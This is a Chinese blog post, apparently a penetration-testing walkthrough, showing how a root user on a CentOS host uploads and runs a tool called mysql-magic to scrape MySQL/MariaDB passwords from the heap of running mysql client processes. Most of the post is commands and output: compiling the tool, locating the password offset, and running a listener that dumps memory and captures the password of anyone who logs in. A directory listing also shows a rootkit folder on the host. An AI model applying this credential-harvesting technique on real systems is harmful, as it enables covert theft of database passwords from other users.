版权声明:本文为博主原创文章,欢迎转载,转载请注明原文超链接https://www.cnblogs.com/zerotrust/p/10846530.html
本文仅限于技术讨论与分享,严禁用于非法用途。
在有root权限的情况下获得Mysql数据库密码的情况有很多,我们来使用其中一种,
-
mysql-magic
-
The mysql client read the password, then write this for some malloc'ed memory, and free it, but just because a chunk was freed doesn't mean it will be used again, to ensure that your programs not keep sensitive information in memory you must overwrite the memory.
-
The main goal is get the password passed through tty, but sometimes it also gets the password passed from command line (-pxxxxxx).
-
首先搭建测试环境,我这里用的是centos7
[root@baoleiji ~]# uname -a
Linux baoleiji 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
[root@baoleiji ~]#
- 安装mariadb
[root@baoleiji ~]# yum -y install mariadb-server
[root@baoleiji ~]# yum -y install gcc
- 启动数据库,添加用户密码
作为依赖被升级:
mariadb-libs.x86_64 1:5.5.60-1.el7_5
完毕!
[root@baoleiji ~]# systemctl start mariadb
[root@baoleiji ~]# mysqladmin -u root password niub666
[root@baoleiji ~]# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
- 渗透环境搭建好了,上传工具到被攻击机
[banxia@banxia-pc 下载]$ scp -r ./mysql-magic root@192.168.2.3:~
- 进入mysql-magic目录编译
[root@baoleiji mysql-magic]# cd ~
[root@baoleiji ~]# cd
.cache/ .config/ Diamorphine/ mysql-magic/
[root@baoleiji ~]# cd
.cache/ .config/ Diamorphine/ mysql-magic/
[root@baoleiji ~]# cd mysql-magic/
[root@baoleiji mysql-magic]# make
- 在内存中搜索密码并获取偏移量
[root@baoleiji mysql-magic]# ./
ignotum/ mysql-magic src/
[root@baoleiji mysql-magic]# ./mysql-magic -s
[19:40:48] executing mysql (/usr/bin/mysql) ...
[19:40:48] pid = 2764
[19:40:48] waiting syscall exit_group
[19:40:48] exit detected !!!
[19:40:48] getting heap info
[19:40:48] reading the heap ...
[19:40:48] password found
[19:40:48] offset list: 0x850
- 启动监听模式
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:42:53] waiting for connections
然后只要有人登录数据库就能拿到密码
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:59:26] waiting for connections
[19:59:26] new connection found
[19:59:26] looking for mysql processes
[19:59:26] getting heap address of pid 3066
[19:59:26] heap = 7f69a70d5000-7f69a7118000
[19:59:26] 274432 bytes read of 274432
[19:59:26] heap saved to /tmp/3066-7f69a70d5000-7f69a7118000.dump
[19:59:26] string at offset 0x850:
[19:59:26] finish
ps:如上软件可能因为编码会显示不出来账号密码,如果没显示出来的话可以在/tmp目录下查看
[root@baoleiji strings /tmp/3000-7f09f89cd000-7f09f8a10000.dump
<charset5.5.60-MariaDB
<copyrig!
root
niub666
出于安全的目的就不放软件链接了,学习需要的可以单独留下邮箱,我发过去。
